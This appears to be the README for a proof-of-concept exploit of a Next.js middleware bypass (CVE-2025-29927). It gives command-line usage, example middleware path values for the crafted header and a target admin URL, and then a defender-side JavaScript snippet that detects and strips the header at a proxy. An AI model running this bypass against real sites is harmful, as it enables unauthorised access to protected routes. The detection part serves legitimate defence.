This is a Proof of Concept (PoC) exploit for the Next.js middleware bypass vulnerability identified as CVE-2025-29927. The vulnerability allows bypassing middleware protections by manipulating the x-middleware-subrequest header.
python3 poc.py --url <TARGET_URL> --middleware <MIDDLEWARE_PATH> [--version <15|legacy>]

--url
    The target URL to test. Example: https://target.com/admin

--middleware
    The middleware path to use for the bypass. Examples:
    - middleware
    - src/middleware
    - pages/_middleware

--version (optional)
    Version mode to use:
    - 15 (default): use the recursion bypass (Next.js >= 15)
    - legacy: use the direct path match (Next.js < 15)
python3 poc.py --url https://example.com/admin --middleware src/middleware --version 15
This PoC is for educational purposes only. Use responsibly and only against systems you have permission to test.
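The bypass described above relies on a client supplying the x-middleware-subrequest header, which Next.js intends only for its own internal subrequests. The following is an added defender-side example, not part of this PoC, showing how a reverse proxy or edge function can flag such requests and strip the header before forwarding; the request objects and log shape are constructed for the example.

```javascript
// Added example (not part of the PoC): detect and neutralise client-supplied
// x-middleware-subrequest headers at the edge. A legitimate browser never sends
// this header, so its presence on an inbound request is a strong indicator of a
// CVE-2025-29927 bypass attempt. Stripping it is a stopgap; the real fix is
// upgrading to a patched Next.js release.

const INTERNAL_HEADER = 'x-middleware-subrequest';

// Returns { suspicious, value } for one request's headers (names are
// case-insensitive in HTTP, so compare in lower case).
function inspectHeaders(headers) {
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() === INTERNAL_HEADER) {
      return { suspicious: true, value: String(value) };
    }
  }
  return { suspicious: false, value: null };
}

// Returns a copy of the headers with the internal header removed, suitable for
// forwarding to the Next.js origin.
function stripInternalHeaders(headers) {
  const out = {};
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() !== INTERNAL_HEADER) out[name] = value;
  }
  return out;
}

// Walk a batch of requests (e.g. from a proxy log) and report every bypass
// attempt with the path it targeted and the header value seen.
function findBypassAttempts(requests) {
  return requests.flatMap((req) => {
    const r = inspectHeaders(req.headers);
    return r.suspicious ? [{ path: req.path, value: r.value }] : [];
  });
}

// Constructed sample requests as a proxy might see them (hosts are fictional).
const SAMPLE_REQUESTS = [
  { path: '/admin', headers: { host: 'app.example.test', 'x-middleware-subrequest': 'middleware' } },
  { path: '/admin', headers: { host: 'app.example.test', 'X-Middleware-Subrequest': 'src/middleware' } },
  { path: '/', headers: { host: 'app.example.test', accept: 'text/html' } },
];

for (const hit of findBypassAttempts(SAMPLE_REQUESTS)) {
  console.log(`ALERT middleware-bypass attempt path=${hit.path} header=${hit.value}`);
}
```

In production the same check would run in the proxy's request hook, emitting the alert to the SIEM and forwarding only the stripped headers to the origin.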